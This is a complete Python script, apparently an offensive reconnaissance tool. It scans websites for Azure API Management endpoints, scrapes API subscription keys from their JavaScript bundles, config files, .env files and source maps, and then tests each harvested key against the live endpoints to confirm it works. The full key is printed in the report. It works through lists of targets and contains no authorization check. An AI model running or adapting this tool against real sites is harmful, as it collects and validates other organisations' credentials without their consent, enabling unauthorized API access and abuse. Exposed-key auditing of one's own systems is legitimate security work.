#!/usr/bin/env python3
"""
APIM Discovery Scanner - Find websites using Azure APIM and check for exposed keys
Targets: JavaScript bundles, config files, source maps, etc.
"""

import re
import sys
import json
import argparse
import concurrent.futures
from typing import List, Dict, Set, Optional
from urllib.parse import urljoin, urlparse
import hashlib

try:
    import requests
    from requests.adapters import HTTPAdapter
    from urllib3.util.retry import Retry
    from bs4 import BeautifulSoup
except ImportError:
    print("Error: Required libraries. Install with:")
    print("  pip install requests beautifulsoup4")
    sys.exit(1)


class APIMDiscoveryScanner:
    """Discover and scan sites using Azure APIM"""
    
    # APIM URL patterns
    APIM_PATTERNS = [
        r'https?://[a-zA-Z0-9\-]+\.azure-api\.net[/\w\-\._~:/?#\[\]@!$&\'()*+,;=]*',
    ]
    
    # APIM key patterns
    KEY_PATTERNS = [
        # GUID format (most common for APIM)
        r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
        # Hex keys (32 chars)
        r'\b[0-9a-f]{32}\b',
        # Alphanumeric keys (32-64 chars)
        r'\b[a-zA-Z0-9]{32,64}\b',
    ]
    
    # Header patterns in code
    HEADER_PATTERNS = [
        r'["\']Ocp-Apim-Subscription-Key["\'][\s:,]+["\']([^"\']+)["\']',
        r'subscription[-_]?key["\']?[\s:=]+["\']([^"\']+)["\']',
        r'api[-_]?key["\']?[\s:=]+["\']([^"\']+)["\']',
    ]
    
    # Files to scan for keys
    TARGET_FILES = [
        # Config files
        'config.js', 'config.json', 'configuration.js', 'constants.js',
        'settings.js', 'settings.json', 'appsettings.json',
        'environment.js', 'env.js', 'app-config.js', 'api-config.js',
        # Build artifacts
        'main.js', 'app.js', 'bundle.js', 'vendor.js', 'runtime.js',
        'main.*.js', 'app.*.js', 'chunk.*.js',
        # Source maps (goldmine for keys)
        'main.js.map', 'app.js.map', 'bundle.js.map',
        # Other
        '.env', 'web.config', 'appsettings.Development.json',
    ]
    
    # Common paths where files are hosted
    COMMON_PATHS = [
        '/', '/js/', '/static/', '/assets/', '/dist/', '/build/',
        '/scripts/', '/config/', '/_next/static/', '/static/js/',
    ]
    
    def __init__(self, timeout=10, threads=10, verbose=False, user_agent=None):
        self.timeout = timeout
        self.threads = threads
        self.verbose = verbose
        self.session = self._create_session(user_agent)
        self.findings = {
            'apim_urls': set(),
            'potential_keys': set(),
            'exposed_files': [],
            'working_keys': []
        }
        
    def _create_session(self, user_agent=None):
        """Create requests session"""
        session = requests.Session()
        retry = Retry(total=2, backoff_factor=0.5, status_forcelist=[500, 502, 503, 504])
        adapter = HTTPAdapter(max_retries=retry)
        session.mount('http://', adapter)
        session.mount('https://', adapter)
        
        # Realistic user agent
        if not user_agent:
            user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        session.headers.update({'User-Agent': user_agent})
        
        return session
    
    def log(self, message, level="INFO"):
        if self.verbose:
            color_codes = {
                "INFO": "\033[94m",
                "SUCCESS": "\033[92m",
                "WARN": "\033[93m",
                "ERROR": "\033[91m",
                "END": "\033[0m"
            }
            color = color_codes.get(level, "")
            end = color_codes["END"]
            print(f"{color}[{level}]{end} {message}")
    
    def detect_apim_usage(self, url: str) -> Dict:
        """Check if a website uses Azure APIM"""
        result = {
            'url': url,
            'uses_apim': False,
            'apim_endpoints': [],
            'confidence': 'none'
        }
        
        try:
            self.log(f"Checking: {url}")
            response = self.session.get(url, timeout=self.timeout, allow_redirects=True)
            
            if response.status_code != 200:
                return result
            
            content = response.text
            
            # Look for APIM URLs in the HTML/JS
            apim_urls = self._extract_apim_urls(content)
            
            if apim_urls:
                result['uses_apim'] = True
                result['apim_endpoints'] = list(apim_urls)
                result['confidence'] = 'high'
                self.log(f"✓ APIM detected! Found {len(apim_urls)} endpoints", "SUCCESS")
                
                # Store globally
                self.findings['apim_urls'].update(apim_urls)
            
            # Also check for APIM-related keywords
            keywords = ['azure-api.net', 'ocp-apim', 'subscription-key', 'apim-']
            keyword_count = sum(content.lower().count(kw) for kw in keywords)
            
            if keyword_count > 0 and not result['uses_apim']:
                result['uses_apim'] = True
                result['confidence'] = 'medium'
                self.log(f"APIM keywords detected ({keyword_count} occurrences)", "WARN")
            
        except requests.exceptions.RequestException as e:
            self.log(f"Error checking {url}: {str(e)[:100]}", "ERROR")
        
        return result
    
    def _extract_apim_urls(self, content: str) -> Set[str]:
        """Extract APIM URLs from content"""
        urls = set()
        for pattern in self.APIM_PATTERNS:
            matches = re.findall(pattern, content, re.IGNORECASE)
            urls.update(matches)
        return urls
    
    def _extract_keys(self, content: str) -> Set[str]:
        """Extract potential API keys from content"""
        keys = set()
        
        # First try header patterns (more accurate)
        for pattern in self.HEADER_PATTERNS:
            matches = re.findall(pattern, content, re.IGNORECASE)
            keys.update(matches)
        
        # Then try general key patterns near APIM references
        lines = content.split('\n')
        for i, line in enumerate(lines):
            if 'apim' in line.lower() or 'subscription' in line.lower() or 'api-key' in line.lower():
                # Check surrounding lines (context window)
                context = '\n'.join(lines[max(0, i-3):min(len(lines), i+4)])
                for pattern in self.KEY_PATTERNS:
                    matches = re.findall(pattern, context)
                    keys.update([k for k in matches if self._is_valid_key(k)])
        
        return keys
    
    def _is_valid_key(self, key: str) -> bool:
        """Validate key to reduce false positives"""
        # Exclude common false positives
        false_positives = [
            'ffffffff', '00000000', '12345678', 'deadbeef',
            'aaaaaaaa', 'bbbbbbbb', 'cccccccc', 'dddddddd',
            '11111111', '99999999', 'abcdef12', '00000000-0000-0000-0000-000000000000',
            'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'
        ]
        
        key_lower = key.lower()
        if key_lower in false_positives:
            return False
        
        # Check entropy (not all same characters)
        if len(set(key_lower)) < 8:
            return False
        
        # Check if it's a common placeholder
        if any(x in key_lower for x in ['example', 'sample', 'test', 'dummy', 'your-key', 'placeholder']):
            return False
        
        return True
    
    def scan_target_files(self, base_url: str) -> List[Dict]:
        """Scan common file locations for exposed keys"""
        results = []
        
        # Generate URLs to check
        urls_to_check = []
        for path in self.COMMON_PATHS:
            for filename in self.TARGET_FILES:
                if '*' in filename:
                    # Skip wildcards for now (would need directory listing)
                    continue
                url = urljoin(base_url, path + filename)
                urls_to_check.append(url)
        
        # Also check the root page for JS/CSS links
        try:
            response = self.session.get(base_url, timeout=self.timeout)
            soup = BeautifulSoup(response.text, 'html.parser')
            
            # Extract all script and link tags
            for tag in soup.find_all(['script', 'link']):
                src = tag.get('src') or tag.get('href')
                if src:
                    full_url = urljoin(base_url, src)
                    if full_url.endswith(('.js', '.json', '.map')):
                        urls_to_check.append(full_url)
        except:
            pass
        
        # Remove duplicates
        urls_to_check = list(set(urls_to_check))
        
        self.log(f"Checking {len(urls_to_check)} potential files...")
        
        # Check files in parallel
        with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:
            future_to_url = {executor.submit(self._check_file, url): url for url in urls_to_check}
            
            for future in concurrent.futures.as_completed(future_to_url):
                result = future.result()
                if result:
                    results.append(result)
        
        return results
    
    def _check_file(self, url: str) -> Optional[Dict]:
        """Check a single file for APIM keys"""
        try:
            response = self.session.get(url, timeout=self.timeout)
            
            if response.status_code == 200:
                content = response.text
                
                # Extract APIM URLs
                apim_urls = self._extract_apim_urls(content)
                
                # Extract keys
                keys = self._extract_keys(content)
                
                if apim_urls or keys:
                    self.log(f"✓ Found in {url}", "SUCCESS")
                    
                    result = {
                        'url': url,
                        'size': len(content),
                        'apim_endpoints': list(apim_urls),
                        'potential_keys': list(keys)
                    }
                    
                    # Store findings
                    self.findings['apim_urls'].update(apim_urls)
                    self.findings['potential_keys'].update(keys)
                    self.findings['exposed_files'].append(result)
                    
                    return result
        except:
            pass
        
        return None
    
    def test_key_on_endpoint(self, endpoint: str, key: str) -> Dict:
        """Test if a key works on an APIM endpoint"""
        result = {
            'endpoint': endpoint,
            'key': key[:8] + '...' + key[-4:],
            'key_full': key,
            'valid': False,
            'status_code': None,
            'error': None
        }
        
        headers_to_try = [
            'Ocp-Apim-Subscription-Key',
            'X-Api-Key',
            'ApiKey',
        ]
        
        # Try common endpoints
        test_paths = ['/', '/api/health', '/health', '/status', '/api/status']
        
        for header_name in headers_to_try:
            for test_path in test_paths:
                try:
                    test_url = urljoin(endpoint, test_path)
                    headers = {header_name: key}
                    
                    response = self.session.get(test_url, headers=headers, timeout=self.timeout)
                    result['status_code'] = response.status_code
                    
                    # Success codes
                    if response.status_code in [200, 201, 202, 204]:
                        result['valid'] = True
                        result['header_name'] = header_name
                        result['test_path'] = test_path
                        self.log(f"✓✓✓ KEY WORKS! {header_name} on {test_url}", "SUCCESS")
                        return result
                    
                    # Key valid but endpoint/method issue
                    elif response.status_code in [400, 404, 405, 429]:
                        result['valid'] = True
                        result['header_name'] = header_name
                        result['test_path'] = test_path
                        result['note'] = 'Key valid but endpoint issue'
                        self.log(f"✓ Key appears valid (HTTP {response.status_code})", "SUCCESS")
                        return result
                    
                except Exception as e:
                    result['error'] = str(e)
        
        return result
    
    def full_scan(self, target_url: str) -> Dict:
        """Complete scan of a target website"""
        self.log(f"\n{'='*80}\nFull Scan: {target_url}\n{'='*80}\n")
        
        # Step 1: Detect APIM usage
        detection = self.detect_apim_usage(target_url)
        
        # Step 2: Scan files for keys
        file_results = self.scan_target_files(target_url)
        
        # Step 3: Test any keys found
        if self.findings['potential_keys'] and self.findings['apim_urls']:
            self.log(f"\nTesting {len(self.findings['potential_keys'])} keys on {len(self.findings['apim_urls'])} endpoints...")
            
            for key in self.findings['potential_keys']:
                for endpoint in self.findings['apim_urls']:
                    test_result = self.test_key_on_endpoint(endpoint, key)
                    if test_result['valid']:
                        self.findings['working_keys'].append(test_result)
        
        return {
            'target': target_url,
            'uses_apim': detection['uses_apim'],
            'apim_endpoints': list(self.findings['apim_urls']),
            'exposed_files': self.findings['exposed_files'],
            'potential_keys_found': len(self.findings['potential_keys']),
            'working_keys': self.findings['working_keys']
        }
    
    def scan_multiple_targets(self, targets: List[str]) -> List[Dict]:
        """Scan multiple targets"""
        results = []
        
        for target in targets:
            try:
                result = self.full_scan(target)
                results.append(result)
            except Exception as e:
                self.log(f"Error scanning {target}: {e}", "ERROR")
        
        return results


def print_report(results: Dict):
    """Pretty-print the outcome of a single full_scan to stdout.

    Expects the summary dict produced by APIMDiscoveryScanner.full_scan
    (keys: target, uses_apim, apim_endpoints, exposed_files, working_keys).
    """
    banner = "=" * 80
    print("\n" + banner)
    print("APIM DISCOVERY SCANNER - RESULTS")
    print(banner)

    uses_apim = results['uses_apim']
    print(f"\nTarget: {results['target']}")
    print(f"Uses APIM: {'YES' if uses_apim else 'NO'}")

    # Discovered *.azure-api.net endpoints, one bullet per URL.
    endpoints = results['apim_endpoints']
    if endpoints:
        print(f"\n[APIM ENDPOINTS FOUND] ({len(endpoints)})")
        for endpoint in endpoints:
            print(f"  • {endpoint}")

    # Files that contained endpoints and/or candidate keys (keys are masked).
    exposed = results['exposed_files']
    if exposed:
        print(f"\n[EXPOSED FILES WITH KEYS] ({len(exposed)})")
        for entry in exposed:
            print(f"\n  File: {entry['url']}")
            print(f"  Size: {entry['size']} bytes")
            if entry['apim_endpoints']:
                print(f"  APIM URLs: {len(entry['apim_endpoints'])}")
            if entry['potential_keys']:
                print(f"  Keys Found: {len(entry['potential_keys'])}")
                for candidate in entry['potential_keys']:
                    print(f"    → {candidate[:8]}...{candidate[-4:]}")

    # Keys that were accepted by an endpoint during testing.
    confirmed = results['working_keys']
    if confirmed:
        print(f"\n[WORKING KEYS FOUND] ({len(confirmed)})")
        for hit in confirmed:
            print(f"\n  ✓ ACTIVE KEY:")
            print(f"    Key: {hit['key']}")
            print(f"    Full: {hit['key_full']}")
            print(f"    Endpoint: {hit['endpoint']}")
            print(f"    Header: {hit.get('header_name', 'N/A')}")
            print(f"    Status: {hit['status_code']}")

    if not uses_apim:
        print("\n[!] No APIM usage detected on this target.")


def main():
    """CLI entry point: parse arguments, run the scanner, print and save results."""
    parser = argparse.ArgumentParser(
        description='APIM Discovery Scanner - Find sites using Azure APIM',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Scan a single website
  python apim_discovery_scanner.py -u https://example.com
  
  # Scan multiple sites from file
  python apim_discovery_scanner.py -f targets.txt
  
  # Verbose output
  python apim_discovery_scanner.py -u https://example.com -v
  
  # Save results
  python apim_discovery_scanner.py -u https://example.com -o results.json
        """
    )

    parser.add_argument('-u', '--url', help='Target website URL')
    parser.add_argument('-f', '--file', help='File with target URLs (one per line)')
    parser.add_argument('-o', '--output', help='Save results to JSON file')
    parser.add_argument('-t', '--timeout', type=int, default=10, help='Timeout (default: 10s)')
    parser.add_argument('--threads', type=int, default=10, help='Threads (default: 10)')
    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')

    args = parser.parse_args()

    # At least one target source is required.
    if not (args.url or args.file):
        parser.print_help()
        sys.exit(1)

    scanner = APIMDiscoveryScanner(
        timeout=args.timeout,
        threads=args.threads,
        verbose=args.verbose
    )

    # Collect targets: -u first, then non-blank lines from -f.
    targets = [args.url] if args.url else []
    if args.file:
        with open(args.file, 'r') as handle:
            targets.extend(line.strip() for line in handle if line.strip())

    # A single target yields one result dict; multiple yield a list of dicts.
    if len(targets) == 1:
        payload = scanner.full_scan(targets[0])
        print_report(payload)
    else:
        payload = scanner.scan_multiple_targets(targets)
        for entry in payload:
            print_report(entry)

    # default=list serializes the sets stored inside findings.
    if args.output:
        with open(args.output, 'w') as handle:
            json.dump(payload, handle, indent=2, default=list)


# Script entry point: run the CLI only when executed directly, not on import.
if __name__ == '__main__':
    main()
